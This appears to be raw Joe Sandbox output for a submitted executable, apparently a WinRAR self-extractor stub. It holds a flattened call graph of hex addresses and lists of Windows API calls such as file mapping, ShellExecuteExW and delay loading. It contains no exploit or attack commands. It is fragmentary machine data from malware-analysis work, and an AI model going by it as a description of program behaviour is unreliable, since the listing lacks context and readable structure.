d8895a 20 API calls _abort 24152->24156 24153->24015 24156->24153 24157->24147 24159 d6feba 24158->24159 24187 d61789 24159->24187 24161 d6fed2 24161->24029 24163 d6fead 24162->24163 24164 d61789 76 API calls 24163->24164 24165 d6fed2 24164->24165 24165->24031 24167 d67c72 __EH_prolog 24166->24167 24204 d6c827 24167->24204 24169 d67c8d 24170 d7e24a new 8 API calls 24169->24170 24171 d67cb7 24170->24171 24210 d7440b 24171->24210 24174 d67ddf 24175 d67de9 24174->24175 24176 d67e53 24175->24176 24239 d6a4c6 
24175->24239 24178 d67ec4 24176->24178 24181 d6a4c6 8 API calls 24176->24181 24217 d6837f 24176->24217 24179 d67f06 24178->24179 24245 d66dc1 74 API calls 24178->24245 24179->24035 24181->24176 24184 d67d09 24183->24184 24186 d67d10 24183->24186 24185 d71acf 84 API calls 24184->24185 24185->24186 24188 d6179f 24187->24188 24199 d617fa __vsnwprintf_l 24187->24199 24189 d617c8 24188->24189 24200 d66e91 74 API calls __vswprintf_c_l 24188->24200 24190 d61827 24189->24190 24196 d617e7 new 24189->24196 24192 d835de 22 API calls 24190->24192 24194 d6182e 24192->24194 24193 d617be 24201 d66efd 75 API calls 24193->24201 24194->24199 24203 d66efd 75 API calls 24194->24203 24196->24199 24202 d66efd 75 API calls 24196->24202 24199->24161 24200->24193 24201->24189 24202->24199 24203->24199 24205 d6c831 __EH_prolog 24204->24205 24206 d7e24a new 8 API calls 24205->24206 24207 d6c874 24206->24207 24208 d7e24a new 8 API calls 24207->24208 24209 d6c898 24208->24209 24209->24169 24211 d74415 __EH_prolog 24210->24211 24212 d7e24a new 8 API calls 24211->24212 24213 d74431 24212->24213 24214 d67ce6 24213->24214 24216 d706ba 78 API calls 24213->24216 24214->24174 24216->24214 24218 d68389 __EH_prolog 24217->24218 24246 d61380 24218->24246 24220 d683a4 24254 d69ef7 24220->24254 24226 d683d3 24374 d61631 24226->24374 24230 d684ce 24277 d61f00 24230->24277 24231 d683cf 24231->24226 24235 d6a4c6 8 API calls 24231->24235 24237 d6846e 24231->24237 24378 d6bac4 CompareStringW 24231->24378 24235->24231 24273 d68517 24237->24273 24238 d684d9 24238->24226 24281 d63aac 24238->24281 24291 d6857b 24238->24291 24240 d6a4db 24239->24240 24244 d6a4df 24240->24244 24605 d6a5f4 24240->24605 24242 d6a4ef 24243 d6a4f4 FindClose 24242->24243 24242->24244 24243->24244 24244->24175 24245->24179 24247 d61385 __EH_prolog 24246->24247 24248 d6c827 8 API calls 24247->24248 24249 d613bd 24248->24249 24250 d7e24a new 8 API calls 24249->24250 24253 d61416 ___scrt_get_show_window_mode 24249->24253 24251 d61403 
24250->24251 24252 d6b07d 82 API calls 24251->24252 24251->24253 24252->24253 24253->24220 24255 d69f0e 24254->24255 24256 d683ba 24255->24256 24380 d66f5d 76 API calls 24255->24380 24256->24226 24258 d619a6 24256->24258 24259 d619b0 __EH_prolog 24258->24259 24269 d61a00 24259->24269 24271 d619e5 24259->24271 24381 d6709d 24259->24381 24261 d61b60 24264 d63aac 97 API calls 24261->24264 24261->24271 24262 d61b50 24384 d66dc1 74 API calls 24262->24384 24266 d61bb3 24264->24266 24265 d61bff 24265->24271 24272 d61c32 24265->24272 24385 d66dc1 74 API calls 24265->24385 24266->24265 24268 d63aac 97 API calls 24266->24268 24268->24266 24269->24261 24269->24262 24269->24271 24270 d63aac 97 API calls 24270->24272 24271->24231 24272->24270 24272->24271 24274 d68524 24273->24274 24403 d70c26 GetSystemTime SystemTimeToFileTime 24274->24403 24276 d68488 24276->24230 24379 d71359 72 API calls 24276->24379 24279 d61f05 __EH_prolog 24277->24279 24278 d61f39 24278->24238 24279->24278 24405 d61951 24279->24405 24282 d63ab8 24281->24282 24283 d63abc 24281->24283 24282->24238 24284 d63af7 24283->24284 24285 d63ae9 24283->24285 24540 d627e8 97 API calls 3 library calls 24284->24540 24287 d63b29 24285->24287 24539 d63281 85 API calls 3 library calls 24285->24539 24287->24238 24289 d63af5 24289->24287 24541 d6204e 74 API calls 24289->24541 24292 d68585 __EH_prolog 24291->24292 24293 d685be 24292->24293 24309 d685c2 24292->24309 24564 d784bd 99 API calls 24292->24564 24294 d685e7 24293->24294 24299 d6867a 24293->24299 24293->24309 24296 d68609 24294->24296 24294->24309 24565 d67b66 151 API calls 24294->24565 24296->24309 24566 d784bd 99 API calls 24296->24566 24299->24309 24542 d65e3a 24299->24542 24301 d68705 24301->24309 24548 d6826a 24301->24548 24304 d68875 24305 d6a4c6 8 API calls 24304->24305 24307 d688e0 24304->24307 24305->24307 24306 d6c991 80 API calls 24317 d6893b _memcmp 24306->24317 24552 d67d6c 24307->24552 24309->24238 24310 d68a70 24311 d68b43 24310->24311 24318 d68abf 
24310->24318 24315 d68b9e 24311->24315 24328 d68b4e 24311->24328 24312 d68a69 24569 d61f94 74 API calls 24312->24569 24325 d68b30 24315->24325 24572 d680ea 96 API calls 24315->24572 24316 d68b9c 24321 d69653 79 API calls 24316->24321 24317->24306 24317->24309 24317->24310 24317->24312 24567 d68236 82 API calls 24317->24567 24568 d61f94 74 API calls 24317->24568 24322 d6a180 4 API calls 24318->24322 24318->24325 24320 d69653 79 API calls 24320->24309 24321->24309 24323 d68af7 24322->24323 24323->24325 24570 d69377 96 API calls 24323->24570 24324 d68c09 24327 d69989 GetFileType 24324->24327 24337 d68c74 24324->24337 24373 d691c1 __except_handler4 24324->24373 24325->24316 24325->24324 24326 d6aa88 8 API calls 24329 d68cc3 24326->24329 24331 d68c4c 24327->24331 24328->24316 24571 d67f26 100 API calls __except_handler4 24328->24571 24333 d6aa88 8 API calls 24329->24333 24331->24337 24573 d61f94 74 API calls 24331->24573 24350 d68cd9 24333->24350 24335 d68c62 24574 d67061 75 API calls 24335->24574 24337->24326 24338 d68df7 24341 d68e69 24338->24341 24342 d68e07 24338->24342 24339 d68efd 24344 d68f23 24339->24344 24345 d68f0f 24339->24345 24361 d68e27 24339->24361 24340 d68d9c 24340->24338 24340->24339 24343 d6826a CharUpperW 24341->24343 24346 d68e4d 24342->24346 24354 d68e15 24342->24354 24347 d68e84 24343->24347 24349 d72c42 75 API calls 24344->24349 24348 d692e6 121 API calls 24345->24348 24346->24361 24577 d67907 108 API calls 24346->24577 24357 d68eb4 24347->24357 24358 d68ead 24347->24358 24347->24361 24348->24361 24352 d68f3c 24349->24352 24350->24340 24575 d69b21 SetFilePointer GetLastError SetEndOfFile 24350->24575 24580 d728f1 121 API calls 24352->24580 24576 d61f94 74 API calls 24354->24576 24579 d69224 94 API calls __EH_prolog 24357->24579 24578 d67698 84 API calls __except_handler4 24358->24578 24364 d6904b 24361->24364 24581 d61f94 74 API calls 24361->24581 24363 d69156 24366 d6a444 4 API calls 24363->24366 24363->24373 24364->24363 24365 d69104 
24364->24365 24364->24373 24558 d69ebf SetEndOfFile 24364->24558 24559 d69d62 24365->24559 24369 d691b1 24366->24369 24369->24373 24582 d61f94 74 API calls 24369->24582 24370 d6914b 24372 d696d0 75 API calls 24370->24372 24372->24363 24373->24320 24375 d61643 24374->24375 24597 d6c8ca 24375->24597 24378->24231 24379->24230 24380->24256 24386 d616d2 24381->24386 24383 d670b9 24383->24269 24384->24271 24385->24272 24387 d616e8 24386->24387 24398 d61740 __vsnwprintf_l 24386->24398 24388 d61711 24387->24388 24399 d66e91 74 API calls __vswprintf_c_l 24387->24399 24389 d61767 24388->24389 24395 d6172d new 24388->24395 24391 d835de 22 API calls 24389->24391 24393 d6176e 24391->24393 24392 d61707 24400 d66efd 75 API calls 24392->24400 24393->24398 24402 d66efd 75 API calls 24393->24402 24395->24398 24401 d66efd 75 API calls 24395->24401 24398->24383 24399->24392 24400->24388 24401->24398 24402->24398 24404 d70c56 __vsnwprintf_l 24403->24404 24404->24276 24406 d61961 24405->24406 24407 d6195d 24405->24407 24409 d61896 24406->24409 24407->24278 24410 d618a8 24409->24410 24411 d618e5 24409->24411 24412 d63aac 97 API calls 24410->24412 24417 d63f18 24411->24417 24415 d618c8 24412->24415 24415->24407 24421 d63f21 24417->24421 24418 d63aac 97 API calls 24418->24421 24419 d61906 24419->24415 24422 d61e00 24419->24422 24421->24418 24421->24419 24434 d7067c 24421->24434 24423 d61e0a __EH_prolog 24422->24423 24442 d63b3d 24423->24442 24425 d61e34 24426 d616d2 76 API calls 24425->24426 24428 d61ebb 24425->24428 24427 d61e4b 24426->24427 24470 d61849 76 API calls 24427->24470 24428->24415 24430 d61e63 24432 d61e6f 24430->24432 24471 d7137a MultiByteToWideChar 24430->24471 24472 d61849 76 API calls 24432->24472 24435 d70683 24434->24435 24436 d7069e 24435->24436 24440 d66e8c RaiseException FindHandler 24435->24440 24438 d706af SetThreadExecutionState 24436->24438 24441 d66e8c RaiseException FindHandler 24436->24441 24438->24421 24440->24436 24441->24438 24443 d63b47 __EH_prolog 
24442->24443 24444 d63b5d 24443->24444 24445 d63b79 24443->24445 24501 d66dc1 74 API calls 24444->24501 24447 d63dc2 24445->24447 24450 d63ba5 24445->24450 24518 d66dc1 74 API calls 24447->24518 24449 d63b68 24449->24425 24450->24449 24473 d72c42 24450->24473 24452 d63c26 24454 d63cb1 24452->24454 24469 d63c1d 24452->24469 24504 d6c991 24452->24504 24453 d63c22 24453->24452 24503 d62034 76 API calls 24453->24503 24486 d6aa88 24454->24486 24456 d63bf4 24456->24452 24456->24453 24457 d63c12 24456->24457 24502 d66dc1 74 API calls 24457->24502 24459 d63cc4 24463 d63d3e 24459->24463 24464 d63d48 24459->24464 24490 d692e6 24463->24490 24510 d728f1 121 API calls 24464->24510 24467 d63d46 24467->24469 24511 d61f94 74 API calls 24467->24511 24512 d71acf 24469->24512 24470->24430 24471->24432 24472->24428 24474 d72c51 24473->24474 24477 d72c5b 24473->24477 24519 d66efd 75 API calls 24474->24519 24476 d72ca2 new 24479 d72da9 Concurrency::cancel_current_task 24476->24479 24480 d72cd9 24476->24480 24485 d72cfd ___scrt_get_show_window_mode 24476->24485 24477->24476 24478 d72c9d Concurrency::cancel_current_task 24477->24478 24477->24485 24521 d8157a RaiseException 24478->24521 24522 d8157a RaiseException 24479->24522 24520 d72b7b 75 API calls 4 library calls 24480->24520 24484 d72dc1 24485->24456 24487 d6aa95 24486->24487 24489 d6aa9f 24486->24489 24488 d7e24a new 8 API calls 24487->24488 24488->24489 24489->24459 24491 d692f0 __EH_prolog 24490->24491 24523 d67dc6 24491->24523 24494 d6709d 76 API calls 24495 d69302 24494->24495 24526 d6ca6c 24495->24526 24497 d6935c 24497->24467 24499 d6ca6c 114 API calls 24500 d69314 24499->24500 24500->24497 24500->24499 24535 d6cc51 97 API calls __vsnwprintf_l 24500->24535 24501->24449 24502->24469 24503->24452 24505 d6c9c4 24504->24505 24506 d6c9b2 24504->24506 24537 d66249 80 API calls 24505->24537 24536 d66249 80 API calls 24506->24536 24509 d6c9bc 24509->24454 24510->24467 24511->24469 24513 d71ad9 24512->24513 24514 d71af2 24513->24514 
24517 d71b06 24513->24517 24538 d7075b 84 API calls 24514->24538 24516 d71af9 24516->24517 24518->24449 24519->24477 24520->24485 24521->24479 24522->24484 24524 d6acf5 GetVersionExW 24523->24524 24525 d67dcb 24524->24525 24525->24494 24532 d6ca82 __vsnwprintf_l 24526->24532 24527 d6cbf7 24528 d6ca0b 6 API calls 24527->24528 24529 d6cc1f 24527->24529 24528->24529 24530 d7067c SetThreadExecutionState RaiseException 24529->24530 24533 d6cbee 24530->24533 24531 d784bd 99 API calls 24531->24532 24532->24527 24532->24531 24532->24533 24534 d6ab70 89 API calls 24532->24534 24533->24500 24534->24532 24535->24500 24536->24509 24537->24509 24538->24516 24539->24289 24540->24289 24541->24287 24543 d65e4a 24542->24543 24583 d65d67 24543->24583 24546 d65e7d 24547 d65eb5 24546->24547 24588 d6ad65 CharUpperW CompareStringW 24546->24588 24547->24301 24549 d68289 24548->24549 24594 d7179d CharUpperW 24549->24594 24551 d68333 24551->24304 24553 d67d7b 24552->24553 24554 d67dbb 24553->24554 24595 d67043 74 API calls 24553->24595 24554->24317 24556 d67db3 24596 d66dc1 74 API calls 24556->24596 24558->24365 24560 d69d73 24559->24560 24562 d69d82 24559->24562 24561 d69d79 FlushFileBuffers 24560->24561 24560->24562 24561->24562 24563 d69dfb SetFileTime 24562->24563 24563->24370 24564->24293 24565->24296 24566->24309 24567->24317 24568->24317 24569->24310 24570->24325 24571->24316 24572->24325 24573->24335 24574->24337 24575->24340 24576->24361 24577->24361 24578->24361 24579->24361 24580->24361 24581->24364 24582->24373 24589 d65c64 24583->24589 24585 d65d88 24585->24546 24587 d65c64 2 API calls 24587->24585 24588->24546 24592 d65c6e 24589->24592 24590 d65d56 24590->24585 24590->24587 24592->24590 24593 d6ad65 CharUpperW CompareStringW 24592->24593 24593->24592 24594->24551 24595->24556 24596->24554 24598 d6c8db 24597->24598 24603 d6a90e 84 API calls 24598->24603 24600 d6c90d 24604 d6a90e 84 API calls 24600->24604 24602 d6c918 24603->24600 24604->24602 24606 d6a5fe 24605->24606 24607 
d6a691 FindNextFileW 24606->24607 24608 d6a621 FindFirstFileW 24606->24608 24610 d6a6b0 24607->24610 24611 d6a69c GetLastError 24607->24611 24609 d6a638 24608->24609 24616 d6a675 24608->24616 24612 d6b66c 2 API calls 24609->24612 24610->24616 24611->24610 24613 d6a64d 24612->24613 24614 d6a651 FindFirstFileW 24613->24614 24615 d6a66a GetLastError 24613->24615 24614->24615 24614->24616 24615->24616 24616->24242 24617->24044 24618->24052 24619->24052 24620->24055 24621->24062 24623 d69ef7 76 API calls 24622->24623 24624 d61f5b 24623->24624 24625 d619a6 97 API calls 24624->24625 24628 d61f78 24624->24628 24626 d61f68 24625->24626 24626->24628 24629 d66dc1 74 API calls 24626->24629 24628->24071 24628->24072 24629->24628 24767 d7b8e0 93 API calls _swprintf 24768 d78ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24771 d916e0 CloseHandle 24634 d7d997 24635 d7d89b 24634->24635 24636 d7df59 ___delayLoadHelper2@8 19 API calls 24635->24636 24636->24635 24638 d7d891 19 API calls ___delayLoadHelper2@8 24773 d77090 114 API calls 24774 d7cc90 70 API calls 24825 d7a990 97 API calls 24826 d79b90 GdipCloneImage GdipAlloc 24827 d89b90 21 API calls 2 library calls 24776 d7a89d 78 API calls 24777 d6ea98 FreeLibrary 24828 d82397 48 API calls 24778 d8ac0e 27 API calls ___delayLoadHelper2@8 24645 d61385 82 API calls 3 library calls 24831 d85780 QueryPerformanceFrequency QueryPerformanceCounter 24781 d876bd 52 API calls 3 library calls 24782 d616b0 84 API calls 24715 d890b0 24723 d8a56f 24715->24723 24719 d890cc 24720 d890d9 24719->24720 24731 d890e0 11 API calls 24719->24731 24722 d890c4 24724 d8a458 _abort 5 API calls 24723->24724 24725 d8a596 24724->24725 24726 d8a5ae TlsAlloc 24725->24726 24727 d8a59f 24725->24727 24726->24727 24728 d7ec4a ___delayLoadHelper2@8 5 API calls 24727->24728 24729 d890ba 24728->24729 24729->24722 24730 d89029 20 API calls 3 library calls 24729->24730 24730->24719 24731->24722 24732 d8a3b0 24733 d8a3bb 24732->24733 24734 d8a6ca 
11 API calls 24733->24734 24735 d8a3e4 24733->24735 24736 d8a3e0 24733->24736 24734->24733 24738 d8a410 DeleteCriticalSection 24735->24738 24738->24736 24783 d81eb0 6 API calls 3 library calls 24834 d879b7 55 API calls _free 24784 d7e4a2 38 API calls 2 library calls 24785 d696a0 79 API calls 24835 d8e9a0 51 API calls 24837 d79b50 GdipDisposeImage GdipFree __except_handler4 24790 d88050 8 API calls ___vcrt_uninitialize 23698 d7dc5d 23699 d7dc2e 23698->23699 23701 d7df59 23699->23701 23729 d7dc67 23701->23729 23703 d7df73 23704 d7dfd0 23703->23704 23715 d7dff4 23703->23715 23705 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23704->23705 23706 d7dfdb RaiseException 23705->23706 23724 d7e1c9 23706->23724 23707 d7e06c LoadLibraryExA 23709 d7e07f GetLastError 23707->23709 23710 d7e0cd 23707->23710 23708 d7ec4a ___delayLoadHelper2@8 5 API calls 23711 d7e1d8 23708->23711 23716 d7e092 23709->23716 23717 d7e0a8 23709->23717 23714 d7e0d8 FreeLibrary 23710->23714 23718 d7e0df 23710->23718 23711->23699 23712 d7e13d GetProcAddress 23713 d7e19b 23712->23713 23720 d7e14d GetLastError 23712->23720 23740 d7ded7 23713->23740 23714->23718 23715->23707 23715->23710 23715->23713 23715->23718 23716->23710 23716->23717 23719 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23717->23719 23718->23712 23718->23713 23721 d7e0b3 RaiseException 23719->23721 23722 d7e160 23720->23722 23721->23724 23722->23713 23725 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23722->23725 23724->23708 23726 d7e181 RaiseException 23725->23726 23727 d7dc67 ___delayLoadHelper2@8 11 API calls 23726->23727 23728 d7e198 23727->23728 23728->23713 23730 d7dc73 23729->23730 23731 d7dc99 23729->23731 23748 d7dd15 23730->23748 23731->23703 23734 d7dc94 23758 d7dc9a 23734->23758 23737 d7ec4a ___delayLoadHelper2@8 5 API calls 23738 d7df55 23737->23738 23738->23703 23739 d7df24 23739->23737 23741 d7df0b 23740->23741 23742 d7dee9 23740->23742 23741->23724 23743 d7dd15 DloadLock 8 API calls 23742->23743 23744 
d7deee 23743->23744 23745 d7df06 23744->23745 23746 d7de67 DloadProtectSection 3 API calls 23744->23746 23767 d7df0f 8 API calls 2 library calls 23745->23767 23746->23745 23749 d7dc9a DloadUnlock 3 API calls 23748->23749 23750 d7dd2a 23749->23750 23751 d7ec4a ___delayLoadHelper2@8 5 API calls 23750->23751 23752 d7dc78 23751->23752 23752->23734 23753 d7de67 23752->23753 23756 d7de7c DloadObtainSection 23753->23756 23754 d7de82 23754->23734 23755 d7deb7 VirtualProtect 23755->23754 23756->23754 23756->23755 23766 d7dd72 VirtualQuery GetSystemInfo 23756->23766 23759 d7dca7 23758->23759 23760 d7dcab 23758->23760 23759->23739 23761 d7dcb3 GetModuleHandleW 23760->23761 23762 d7dcaf 23760->23762 23763 d7dcc9 GetProcAddress 23761->23763 23765 d7dcc5 23761->23765 23762->23739 23764 d7dcd9 GetProcAddress 23763->23764 23763->23765 23764->23765 23765->23739 23766->23755 23767->23741 23771 d69b59 23772 d69b63 23771->23772 23773 d69bd7 23771->23773 23774 d69bad SetFilePointer 23772->23774 23774->23773 23775 d69bcd GetLastError 23774->23775 23775->23773 24839 d7be49 98 API calls 3 library calls 24792 d7ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24793 d78c40 GetClientRect 24794 d83040 5 API calls 2 library calls 24795 d90040 IsProcessorFeaturePresent 24840 d7d34e DialogBoxParamW 24796 d75c77 121 API calls __vsnwprintf_l 24797 d61075 82 API calls pre_c_initialization 23786 d7d573 23787 d7d580 23786->23787 23788 d6ddd1 53 API calls 23787->23788 23789 d7d594 23788->23789 23790 d6400a _swprintf 51 API calls 23789->23790 23791 d7d5a6 SetDlgItemTextW 23790->23791 23794 d7ac74 PeekMessageW 23791->23794 23795 d7ac8f GetMessageW 23794->23795 23796 d7acc8 23794->23796 23797 d7aca5 IsDialogMessageW 23795->23797 23798 d7acb4 TranslateMessage DispatchMessageW 23795->23798 23797->23796 23797->23798 23798->23796 24802 d7fc60 51 API calls 2 library calls 24805 d83460 RtlUnwind 24806 d89c60 71 API calls _free 24842 d66110 80 
API calls 24843 d8b710 GetProcessHeap 24845 d7be49 108 API calls 4 library calls 24846 d61f05 126 API calls __EH_prolog 24807 d7ea00 46 API calls 6 library calls 24650 d7c40e 24651 d7c4c7 24650->24651 24659 d7c42c _wcschr 24650->24659 24652 d7c4e5 24651->24652 24668 d7be49 _wcsrchr 24651->24668 24685 d7ce22 24651->24685 24655 d7ce22 18 API calls 24652->24655 24652->24668 24653 d7aa36 ExpandEnvironmentStringsW 24653->24668 24655->24668 24656 d7ca8d 24658 d717ac CompareStringW 24658->24659 24659->24651 24659->24658 24660 d7c11d SetWindowTextW 24660->24668 24663 d835de 22 API calls 24663->24668 24665 d7bf0b SetFileAttributesW 24667 d7bfc5 GetFileAttributesW 24665->24667 24678 d7bf25 ___scrt_get_show_window_mode 24665->24678 24667->24668 24669 d7bfd7 DeleteFileW 24667->24669 24668->24653 24668->24656 24668->24660 24668->24663 24668->24665 24671 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24668->24671 24674 d7c327 SendMessageW 24668->24674 24679 d717ac CompareStringW 24668->24679 24680 d79da4 GetCurrentDirectoryW 24668->24680 24682 d6a52a 7 API calls 24668->24682 24683 d6a4b3 FindClose 24668->24683 24684 d7ab9a 76 API calls new 24668->24684 24669->24668 24672 d7bfe8 24669->24672 24671->24668 24673 d6400a _swprintf 51 API calls 24672->24673 24675 d7c008 GetFileAttributesW 24673->24675 24674->24668 24675->24672 24676 d7c01d MoveFileW 24675->24676 24676->24668 24677 d7c035 MoveFileExW 24676->24677 24677->24668 24678->24667 24678->24668 24681 d6b4f7 52 API calls 2 library calls 24678->24681 24679->24668 24680->24668 24681->24678 24682->24668 24683->24668 24684->24668 24686 d7ce2c ___scrt_get_show_window_mode 24685->24686 24687 d7cf1b 24686->24687 24693 d7d08a 24686->24693 24708 d717ac CompareStringW 24686->24708 24689 d6a180 4 API calls 24687->24689 24690 d7cf30 24689->24690 24691 d7cf4f ShellExecuteExW 24690->24691 24709 d6b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24690->24709 24691->24693 24699 d7cf62 24691->24699 24693->24652 24694 d7cf47 
24694->24691 24695 d7cf9b 24710 d7d2e6 6 API calls 24695->24710 24696 d7cff1 CloseHandle 24697 d7cfff 24696->24697 24698 d7d00a 24696->24698 24711 d717ac CompareStringW 24697->24711 24698->24693 24704 d7d081 ShowWindow 24698->24704 24699->24695 24699->24696 24701 d7cf91 ShowWindow 24699->24701 24701->24695 24703 d7cfb3 24703->24696 24705 d7cfc6 GetExitCodeProcess 24703->24705 24704->24693 24705->24696 24706 d7cfd9 24705->24706 24706->24696 24708->24687 24709->24694 24710->24703 24711->24698 24808 d7ec0b 28 API calls 2 library calls 24848 d7db0b 19 API calls ___delayLoadHelper2@8 24849 d7be49 103 API calls 4 library calls 24809 d7a430 73 API calls 24739 d8b731 31 API calls ___delayLoadHelper2@8 24810 d61025 29 API calls pre_c_initialization 24745 d69f2f 24746 d69f44 24745->24746 24747 d69f3d 24745->24747 24748 d69f4a GetStdHandle 24746->24748 24755 d69f55 24746->24755 24748->24755 24749 d69fa9 WriteFile 24749->24755 24750 d69f7c WriteFile 24751 d69f7a 24750->24751 24750->24755 24751->24750 24751->24755 24753 d6a031 24757 d67061 75 API calls 24753->24757 24755->24747 24755->24749 24755->24750 24755->24751 24755->24753 24756 d66e18 60 API calls 24755->24756 24756->24755 24757->24747

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                                  • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                                  • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                                  • Part of subcall function 00D79DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D79DAC
                                  • Part of subcall function 00D7A335: OleInitialize.OLE32(00000000), ref: 00D7A34E
                                  • Part of subcall function 00D7A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                                  • Part of subcall function 00D7A335: SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                                  • Part of subcall function 00D713B3: GetCPInfo.KERNEL32(00000000,?), ref: 00D713C4
                                  • Part of subcall function 00D713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D713D8
                                • GetCommandLineW.KERNEL32 ref: 00D7D61C
                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D7D643
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D7D654
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00D7D68E
                                  • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                                  • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                                • CloseHandle.KERNEL32(00000000), ref: 00D7D697
                                • GetModuleFileNameW.KERNEL32(00000000,00DBDC90,00000800), ref: 00D7D6B2
                                • SetEnvironmentVariableW.KERNEL32(sfxname,00DBDC90), ref: 00D7D6BE
                                • GetLocalTime.KERNEL32(?), ref: 00D7D6C9
                                • _swprintf.LIBCMT ref: 00D7D708
                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D7D71A
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00D7D721
                                • LoadIconW.USER32(00000000,00000064), ref: 00D7D738
                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00D7D789
                                • Sleep.KERNEL32(?), ref: 00D7D7B7
                                • DeleteObject.GDI32 ref: 00D7D7F0
                                • DeleteObject.GDI32(?), ref: 00D7D800
                                • CloseHandle.KERNEL32 ref: 00D7D843
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                • API String ID: 788466649-3743209390
                                • Opcode ID: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                                • Instruction ID: 8d0b8354c1599ae57036f21089078b39569876d11931fd150247357d846e2589
                                • Opcode Fuzzy Hash: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                                • Instruction Fuzzy Hash: E761AE71904341AFD320AFA5EC49F6A3BA9EF49744F04442AF94DD23A1EBB89904D772

                                Control-flow Graph

                                control_flow_graph 770 d79e1c-d79e38 FindResourceW 771 d79f2f-d79f32 770->771 772 d79e3e-d79e50 SizeofResource 770->772 773 d79e52-d79e61 LoadResource 772->773 774 d79e70-d79e72 772->774 773->774 775 d79e63-d79e6e LockResource 773->775 776 d79f2e 774->776 775->774 777 d79e77-d79e8c GlobalAlloc 775->777 776->771 778 d79e92-d79e9b GlobalLock 777->778 779 d79f28-d79f2d 777->779 780 d79f21-d79f22 GlobalFree 778->780 781 d79ea1-d79ebf call d7f4b0 778->781 779->776 780->779 785 d79ec1-d79ee3 call d79d7b 781->785 786 d79f1a-d79f1b GlobalUnlock 781->786 785->786 791 d79ee5-d79eed 785->791 786->780 792 d79eef-d79f03 GdipCreateHBITMAPFromBitmap 791->792 793 d79f08-d79f16 791->793 792->793 794 d79f05 792->794 793->786 794->793
                                APIs
                                • FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                                • LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                                • LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D7AE4D,00000066), ref: 00D79E82
                                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D7AE4D,00000066), ref: 00D79E93
                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D79EFC
                                • GlobalUnlock.KERNEL32(00000000), ref: 00D79F1B
                                • GlobalFree.KERNEL32(00000000), ref: 00D79F22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
